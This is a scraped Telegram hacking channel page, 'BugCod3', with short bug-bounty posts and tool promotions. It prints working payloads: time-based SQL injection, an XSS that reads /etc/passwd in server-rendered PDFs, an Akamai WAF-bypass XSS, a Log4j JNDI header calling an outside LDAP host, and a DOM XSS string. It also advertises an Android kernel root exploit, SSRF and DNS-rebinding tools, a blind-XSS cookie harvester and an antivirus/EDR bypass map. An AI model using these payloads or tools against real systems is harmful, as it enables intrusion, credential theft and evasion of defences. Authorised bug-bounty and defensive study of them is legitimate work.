BugCod3
7.26K subscribers
334 photos
6 videos
7 files
443 links
[ BugCod3 ] โ€” From Shadows To Shells โšก๏ธ

๐Ÿ•ถ Hacking | ๐Ÿž Bug Bounty | ๐Ÿ” Security Tools
โš”๏ธ Learn โ€ข Hunt โ€ข Dominate

๐Ÿ‘ฅ Group: T.me/BugCod3GP
๐Ÿ“‚ Topic: T.me/BugCod3Topic

๐ŸŒ Web: BugCod3.com
๐Ÿค– Contact: T.me/BugCod3BOT
๐Ÿ“ง Email: BugCod3@protonmail.com
Download Telegram
For 0Day SQLI in

(app extension)

payload was:
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

#BugBounty #Tips
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
โค2โšก1๐Ÿ‘1๐Ÿ”ฅ1
XSS to Exfiltrate Data from PDFs

<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(โ€˜GETโ€™,โ€™file:///etc/hostsโ€™);x.send();</script><script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(โ€˜GETโ€™,โ€™file:///etc/passwdโ€™);x.send();</script>

How to use:
Server Side XSS (Dynamic PDF)

#XSS #PDF
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
๐Ÿ”ฅ3โค2โšก1
โ”Œโ”€โ”€(BugCod3ใ‰ฟkali)-[~]
โ””โ”€$ sudo rm -rf *1402

โ”Œโ”€โ”€(BugCod3ใ‰ฟkali)-[~]
โ””โ”€$ sudo mkdir 1403


#Notification #NewYear
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
โค5โšก1๐Ÿ”ฅ1
If you are testing API, before fuzzing observe these:

1. Does it throw same data for /v1/user and /v1/user

2. Is it case sensitive?

/v1/user => 200 OK

/v1/USER => 200 OK

OR

/v1/user => 200 OK

/v1/User => 404

How is the naming convention used? user_groups or userGroups , etc then you can build your fuzzing wordlist according to this data, but there are always exceptions.

#BugBounty #Tips
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
๐Ÿ‘3โค1โšก1๐Ÿ”ฅ1
Akamai WAF bypass XSS

<input id=b value=javascrip>
<input id=c value=t:aler>
<input id=d value=t(1)>
<lol
contenteditable
onbeforeinput='location=b.value+c.value+d.value'>

#BugBounty #Tips
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
โšก1โค1๐Ÿ”ฅ1
Log4j ๐Ÿ™Œ Application was running java

Vulnerable header :
X-Forwarded-For: ${jndi:ldap://${:-874}${:-705}.${hostName}.xforwardedfor.<Server-link>}

#BugBounty #Tips #Security
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
โšก1โค1๐Ÿ”ฅ1
Easy P1 ๐Ÿ”ฅ
Add to your wordlist

/ganglia/
/ganglia/?c=ElastiCluster&m=load_one&r=hour&s=by%20name&hc=4&mc=2


#BugBounty #Tips
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
โค1โšก1๐Ÿ”ฅ1
Mali GPU Kernel LPE

Android 14 kernel exploit for Pixel7/8 Pro

This article provides an in-depth analysis of two kernel vulnerabilities within the Mali GPU, reachable from the default application sandbox, which I independently identified and reported to Google. It includes a kernel exploit that achieves arbitrary kernel r/w capabilities. Consequently, it disables SELinux and elevates privileges to root on Google Pixel 7 and 8 Pro models running the following Android 14 versions:

Pixel 8 Pro: google/husky/husky:14/UD1A.231105.004/11010374:user/release-keys
Pixel 7 Pro: google/cheetah/cheetah:14/UP1A.231105.003/11010452:user/release-keys
Pixel 7 Pro: google/cheetah/cheetah:14/UP1A.231005.007/10754064:user/release-keys
Pixel 7: google/panther/panther:14/UP1A.231105.003/11010452:user/release-keys

Vulnerabilities:
This exploit leverages two vulnerabilities: an integer overflow resulting from an incomplete patch in the gpu_pixel_handle_buffer_liveness_update_ioctl ioctl command, and an information leak within the timeline stream message buffers.

Github

โฌ‡๏ธ Download
๐Ÿ”“ BugCod3

#C #Exploit #Android #Kernel #Pixel
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
โค1โšก1๐Ÿ‘1๐Ÿ”ฅ1
java2S3 Amazon S3 Bucket Enumeration Tool

Introduction:
This Python script automates the enumaration of S3 Buckets referenced in a subdomain's javascript files. This allows the bug bounty hunter to check for security misconfigurations and pentest Amazon S3 Buckets.

Features:
โšช๏ธ Fetches HTTP status codes for subdomains
โšช๏ธ Retrieves JavaScript URLs associated with each subdomain
โšช๏ธ Identifies Amazon S3 buckets in the content

Getting Started:
Prerequisites:
Python 3.x
Install required libraries:
pip install requests


Usage:
Create a text file (input.txt) containing a list of subdomains (one per line).

python js2s3.py input.txt example.com output.txt


Github

โฌ‡๏ธ Download
๐Ÿ”“ BugCod3

#Python #Amazon #S3 #Buckets
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
โšก2โค1๐Ÿ”ฅ1
SSRF Proxy

SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP traffic through HTTP servers vulnerable to Server-Side Request Forgery (SSRF).

Once configured, SSRF Proxy attempts to format client HTTP requests appropriately for the vulnerable server. Likewise, the server's response is parsed and formatted for the client.

By correctly formatting the client request and stripping unwanted junk from the response it is possible to use SSRF Proxy as a HTTP proxy for web browsers, proxychains, and scanning tools such as sqlmap, nmap, dirb and nikto.

SSRF Proxy also assists with leveraging blind SSRF vulnerabilities to perform time-based attacks, such as blind time-based SQL injection with sqlmap.

Requirements:
Ruby 2.2.2 or newer.
Ruby Gems:
celluloid-io
webrick
logger
colorize
ipaddress
base32
htmlentities
socksify
mimemagic

Installation:
gem install ssrf_proxy


Usage (command line):
ssrf-proxy [options] -u <SSRF URL>

ssrf-proxy -u http://target/?url=xxURLxx


Github

โฌ‡๏ธ Download
๐Ÿ”“ BugCod3

#Ruby #Proxy #SSRF
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
โค2โšก1๐Ÿ”ฅ1
httprebind

Automatic tool for DNS rebinding-based SSRF attacks

Installation:
sudo pip install dnslib flask flask_cors


Usage:
sudo python httprebind.py domain.name serverIp mode


Where mode is one of: ec2, ecs, gcloud

Make sure you point your domain's nameservers to the server indicated by serverIp, and that that IP is the external address of the server, IPv4.

Github

โฌ‡๏ธ Download
๐Ÿ”“ BugCod3

#Python #DNS #SSRF #Attack
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
โšก1โค1๐Ÿ”ฅ1
hackerone-reports

Top disclosed reports from HackerOne

Tops of HackerOne reports. All reports' raw info stored in data.csv. Scripts to update this file are written in Python 3 and require chromedriver and Chromium executables at PATH. Every script contains some info about how it works. The run order of scripts:


1. fetcher.py
2. uniquer.py
3. filler.py
4. rater.py

Github

โฌ‡๏ธ Download
๐Ÿ”“ BugCod3

#BugBounty #Reports #HackeOne
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
โšก3โค1๐Ÿ”ฅ1
DOM-XSS-SiteMinder

Payload:
\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e

๐Ÿ“ž Nuclei Template

#XSS #DOM
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
โ›“ T.me/BugCod3Topic
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ”ฅ3โšก2โค1๐Ÿคฃ1
Form Finder

This script can be used to find HTML forms in the list of endpoints/URLs.

Usage:
python3 formfinder.py endpoints.txt


๐Ÿ˜ธ Github

โฌ‡๏ธ Donwload
๐Ÿ”’ BugCod3

#Python #Form #Finder
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
โ›“ T.me/BugCod3Topic
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ”ฅ3โšก2โค1๐Ÿ‘1
Algolia AppId+API-KEY PoC to show permissions:

curl "https://[APP-ID]-dsn.algolia.net/1/keys/[APPKEY]?x-algolia-application-id=[APP-ID]&x-algolia-api-key=[ApiKey]"

If ACL is Search only, it's likely to be a P5, if it has other sensitive permissions.. it's a P1/P2

#BugBounty #Tips
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
โ›“ T.me/BugCod3Topic
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โค2โšก2๐Ÿ”ฅ2๐Ÿคฃ1
โœจ Smaug - The OSINT for database's โœจ

Search inside every file, folder and subfolder for OSINT
(based on the book The Hobbit, Smaug the dragon)

๐Ÿ’ฌ
It is not an online tool. This program scans your local database to search a variable you specified inside each file with bruteforce.
This tool has been created for utility to search inside every file which contains your input,
and also not all files/folders are supported (outside UTF-8 unicode) atm.
Could be useful for osint individuals.

๐Ÿ”ผ Compile:
๐Ÿ–ฅ Unix:
โšช๏ธ run make inside smaug-main

๐Ÿ–ฅ Windows:
โšช๏ธ linux enviroment, example WSL or Chocolatey, run make inside smaug-main.

โšช๏ธ otherwise, if you are running inside an IDE, just compile the program specifying the Makefile under smaug-main.

๐Ÿ’ป Usage:
โšช๏ธ Place it (smaug.exe) under the root directory containing all files and subfolders.
โšช๏ธ Run cmd.exe inside that folder
โšช๏ธ Run: smaug.exe text_variable
โšช๏ธ Now you wait till it finishes searching.

๐Ÿ˜ธ Github

โฌ‡๏ธ Download
๐Ÿ”’ BugCod3

#C #Smaug #OSINT
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก3โค2๐Ÿ”ฅ2
๐Ÿฆˆ Wireshark ๐Ÿฆˆ

(4.2.4) has been released. Enjoy.

#Wireshark #Released
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ“ฃ T.me/BugCod3
๐Ÿ“ฃ T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
โค3โšก2๐Ÿ”ฅ2
BypassAV

This map lists the essential techniques to bypass anti-virus and EDR

๐Ÿ’ฌ
as a reminder: it is highly recommended to read the articles related to manual techniques rather than using open source tools which are more likely to be suspected by the anti-virus because of IOSs

๐Ÿ˜ธ Github

โฌ‡๏ธ Download
๐Ÿ”’ BugCod3

#Pentest #AV #Bypass
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โค3โšก2๐Ÿ”ฅ2๐Ÿ‘1
๐Ÿ•ท ezXSS ๐Ÿ•ท

ezXSS is an easy way for penetration testers and bug bounty hunters to test (blind) Cross Site Scripting.

๐Ÿ’ฌ
ezXSS is a tool that is designed to help find and exploit cross-site scripting (XSS) vulnerabilities. One of the key features of ezXSS is its ability to identify and exploit blind XSS vulnerabilities, which can be difficult to find using traditional methods.

๐Ÿ“Š Features:
โšช๏ธ Easy to use dashboard with settings, statistics, payloads, view/share/search reports
โšช๏ธ ๐Ÿ†• Persistent XSS sessions with reverse proxy aslong as the browser is active
โšช๏ธ Manage unlimited users with permissions to personal payloads & their reports
โšช๏ธ Instant alerts via mail, Telegram, Slack, Discord or custom callback URL
โšช๏ธ Custom extra javascript payloads
โšช๏ธ Custom payload links to distinguish insert points
โšช๏ธ Extract additional pages, block, whitelist and other filters
โšช๏ธ Secure your login with Two-factor (2FA)
โšช๏ธ The following information can be collected on a vulnerable page:
โšซ๏ธ The URL of the page
โšซ๏ธ IP Address
โšซ๏ธ Any page referer (or share referer)
โšซ๏ธ The User-Agent
โšซ๏ธ All Non-HTTP-Only Cookies
โšซ๏ธ All Locale Storage
โšซ๏ธ All Session Storage
โšซ๏ธ Full HTML DOM source of the page
โšซ๏ธ Page origin
โšซ๏ธ Time of execution
โšซ๏ธ Payload URL
โšซ๏ธ Screenshot of the page
โšซ๏ธ Extract additional defined pages
โšช๏ธ Triggers in all browsers, starting from Chrome 3+, IE 8+, Firefox 4+, Opera 10.5+, Safari 4+
โšช๏ธ much much more, and, its just ez :-)

Required:
โšช๏ธ Server or shared web hosting with PHP 7.1 or up
โšช๏ธ Domain name (consider a short one or check out shortboost)
โšช๏ธ SSL Certificate to test on https websites (consider Cloudflare or Let's Encrypt for a free SSL)

Installation:
โšช๏ธ ezXSS is ez to install with Apache, NGINX or Docker
โšช๏ธ visit the wiki for installation instructions.

๐Ÿ˜ธ Github

โฌ‡๏ธ Download
๐Ÿ”’ BugCod3

#PHP #XSS #Blind #Pentest
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ”ฅ5โค2โšก2๐Ÿ‘1
This media is not supported in your browser
VIEW IN TELEGRAM
๐Ÿ” Chiasmodon ๐Ÿ”

๐Ÿ’ฌ
Chiasmodon is an OSINT (Open Source Intelligence) tool designed to assist in the process of gathering information about target domain. Its primary functionality revolves around searching for domain-related data, including domain emails, domain credentials (usernames and passwords), CIDRs (Classless Inter-Domain Routing), ASNs (Autonomous System Numbers), and subdomains. the tool allows users to search by domain, CIDR, ASN, email, username, password, or Google Play application ID.

๐Ÿ“Š Features:
๐ŸŒ Domain: Conduct targeted searches by specifying a domain name to gather relevant information related to the domain.
๐ŸŽฎ Google Play Application: Search for information related to a specific application on the Google Play Store by providing the application ID.
๐Ÿ”Ž CIDR and ๐Ÿ”ข๐Ÿ”ขASN: Explore CIDR blocks and Autonomous System Numbers (ASNs) associated with the target domain to gain insights into network infrastructure and potential vulnerabilities.
โœ‰๏ธ Email, ๐Ÿ‘คUsername, ๐Ÿ”’ Password: Conduct searches based on email, username, or password to identify potential security risks or compromised credentials.
๐ŸŒ Country: Sort and filter search results by country to gain insights into the geographic distribution of the identified information.
๐Ÿ“‹ Output Customization: Choose the desired output format (text, JSON, or CSV) and specify the filename to save the search results.
โš™๏ธ Additional Options: The tool offers various additional options, such as viewing different result types (credentials, URLs, subdomains, emails, passwords, usernames, or applications), setting API tokens, specifying timeouts, limiting results, and more.

๐Ÿ”ผ Install:
pip install chiasmodon


๐Ÿ’ป Usage:
chiasmodon_cli.py -h


๐Ÿ˜ธ Github

โฌ‡๏ธ Download
๐Ÿ”’ BugCod3

#OSINT #BugBounty #Tools
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก4๐Ÿ”ฅ3๐Ÿ‘2โค1
Learn the basics of burpsuite. Start using Burp with web applications.

โฌ‡๏ธ Download

#Burpsuite #Kalilinux #Cybersecurity
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ“ฃ T.me/BugCod3
๐Ÿ“ฃ T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก3๐Ÿ”ฅ2โค1